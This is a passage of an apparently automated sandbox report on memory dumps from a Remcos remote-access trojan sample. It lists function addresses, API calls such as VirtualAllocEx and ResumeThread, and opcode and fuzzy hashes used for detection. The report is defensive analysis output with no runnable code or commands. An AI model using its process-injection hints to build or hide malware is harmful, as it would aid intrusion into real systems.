                                              Function 074E7770 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074E77E6
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 6ec2e1c4be6b018d500a09202390a226d05b69816a430df640fbb01ede4c4d41
                                              • Instruction ID: 852d0f81a42cc5c758821a4e577b6c62f6a54f86a0c2ebb24c88a58eb4fcfe9d
                                              • Opcode Fuzzy Hash: 6ec2e1c4be6b018d500a09202390a226d05b69816a430df640fbb01ede4c4d41
                                              • Instruction Fuzzy Hash: 1E1159B6800209CFDB10DFA9D8457DEBBF5EF48320F14881AD555A7250C7759554CBA0
                                              Function 074E71B3 Relevance: 1.6, APIs: 1, Instructions: 50threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 4ba3a55314cc70f1fc6f2e4f4b997ff26d94db93dceb3be8856f6fb044f09615
                                              • Instruction ID: 0241344d81c7c257992440f1d8eb37867e8a824e67ee7df37dc7e77363f4ea5c
                                              • Opcode Fuzzy Hash: 4ba3a55314cc70f1fc6f2e4f4b997ff26d94db93dceb3be8856f6fb044f09615
                                              • Instruction Fuzzy Hash: DE116AB28003498FDB20DFAAD4457EEFBF5EF48320F14842AD519A7340C779A544CBA4
                                              Function 074E71B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: 75dcc8e911c635304c2d0de88b6538e2ea4ed07423e97d8d306a6be60e94a873
                                              • Instruction ID: 8ebc97e10f5aa72a45413f5c534aaba11c136b31d7f8e58b1f38bf5f7192e07b
                                              • Opcode Fuzzy Hash: 75dcc8e911c635304c2d0de88b6538e2ea4ed07423e97d8d306a6be60e94a873
                                              • Instruction Fuzzy Hash: 30113AB19003598FDB10DFAAD4457EEFBF5EF48220F14841AD519A7240C779A544CBA5
                                              Function 0132AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0132AF5E
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1757288277.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_1320000_remcos.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: b7f57c2015762c0991889583999535a8de7358d24a43542b49a1668c824bb358
                                              • Instruction ID: d583e2adb765289c9574689d7a4253ecc3a35a1d7be1d79f4bf2bb115a75ef18
                                              • Opcode Fuzzy Hash: b7f57c2015762c0991889583999535a8de7358d24a43542b49a1668c824bb358
                                              • Instruction Fuzzy Hash: 121110B6C006598FDB10DF9AD844BDEFBF4EB88214F10842AD529A7640D379A549CFA1
                                              Function 074EB130 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074EB195
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: c18f1db6749fd97677f1676af094401217e156cba49b7644aa1fb6b2b42a910d
                                              • Instruction ID: 6a822e2f7ff1b830ad841d1e0b47964a58c996e19d3eb52237e3ed93184c38ef
                                              • Opcode Fuzzy Hash: c18f1db6749fd97677f1676af094401217e156cba49b7644aa1fb6b2b42a910d
                                              • Instruction Fuzzy Hash: 701103B58003499FDB20CF9AD885BDEFBF8EB48360F10841AE958A3740C375A944CFA1
                                              Function 074E4460 Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074EB195
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1773800789.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_74e0000_remcos.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 4d99a29162eb8a89b7335dfc0a13d3308d493516b897b88c2b1f685a427a7a40
                                              • Instruction ID: 10ba9940ffa4cca3c38ecb29deedc6377ea01dcefdde210161b0efa07b3da5d1
                                              • Opcode Fuzzy Hash: 4d99a29162eb8a89b7335dfc0a13d3308d493516b897b88c2b1f685a427a7a40
                                              • Instruction Fuzzy Hash: E001D3B48007499FDB10DF9AC484BDEBBF8EB08360F108819E554A7250D374A940CFA1
                                              Function 0118D01C Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1756904584.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_118d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 19f4d0527c990ff1ce4c45733acb2f26f7ea9eae8c60d74c653928ee103f8490
                                              • Instruction ID: df9c6413e32a45419babae5095fa692c48f581047cad8b461bb9ff9193cf397a
                                              • Opcode Fuzzy Hash: 19f4d0527c990ff1ce4c45733acb2f26f7ea9eae8c60d74c653928ee103f8490
                                              • Instruction Fuzzy Hash: 9221D071604344DFDF19EF94E9C0B26BB65EB84214F24C5A9D80A4B2C6C736D847CA62
                                              Function 0118D1D4 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1756904584.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_118d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2ab1ee665eea20f6fff17372acc0eaa3c8c7afbde4f0b1b40516a31e1abfaf6
                                              • Instruction ID: 41b98ba32660d3d895eea83d94db3ed2fd5c92c832abf25c91ddf25be874b69a
                                              • Opcode Fuzzy Hash: d2ab1ee665eea20f6fff17372acc0eaa3c8c7afbde4f0b1b40516a31e1abfaf6
                                              • Instruction Fuzzy Hash: 8121B3715043449FDF09EF94E5C0B25BB66FB84324F24C56DE9094B2D2C736D846CE62
                                              Function 0118D1CF Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1756904584.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_118d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: fa84834b031796ec6785ec939be752f28626635313a150831ae5db378c849a36
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: FD11BB75504280DFCF06DF54D5C0B15BBA2FB84324F28C6AAD8494B696C33AD44ACF62
                                              Function 0118D017 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1756904584.000000000118D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0118D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_118d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction ID: 2ece2793a4ecb7a266a7752d95bdf62c48f4c56d7e8b764fd6694bf18b09b5f8
                                              • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                              • Instruction Fuzzy Hash: EA11BB75504380CFDB16DF54E5C4B15BBA2FB84314F28C6AAD8494B696C33AD44BCFA2
                                              Function 0117D759 Relevance: .0, Instructions: 45COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1756825969.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_117d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6fadf90f72a9864e8e1838a981693f4a8cc11f65f2416a9b69542a9c151fad48
                                              • Instruction ID: 3e3ea4b6d3d3a38dbc0eb7f7382f41873821cb3b9adebbc030d5a20655f5800b
                                              • Opcode Fuzzy Hash: 6fadf90f72a9864e8e1838a981693f4a8cc11f65f2416a9b69542a9c151fad48
                                              • Instruction Fuzzy Hash: 8D01A731104B889BEB184A99ED84B66FFA8DF41229F18C45AED094A386D7799440C672
                                              Function 0117D758 Relevance: .0, Instructions: 36COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000021.00000002.1756825969.000000000117D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0117D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_33_2_117d000_remcos.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe3b7a93fad9a51f73957d2ef14ca5ebe4473eabad87de509f2f56055d4bd438
                                              • Instruction ID: 0ff099e285fdf7a7f7ad0f21ebb859a1058d10e82f3fd07f36ff7f87552d1d68
                                              • Opcode Fuzzy Hash: fe3b7a93fad9a51f73957d2ef14ca5ebe4473eabad87de509f2f56055d4bd438
                                              • Instruction Fuzzy Hash: 07F0C2310047849FEB148A0AED84B62FFA8EF40625F18C45AEE080A386C3799840CBB1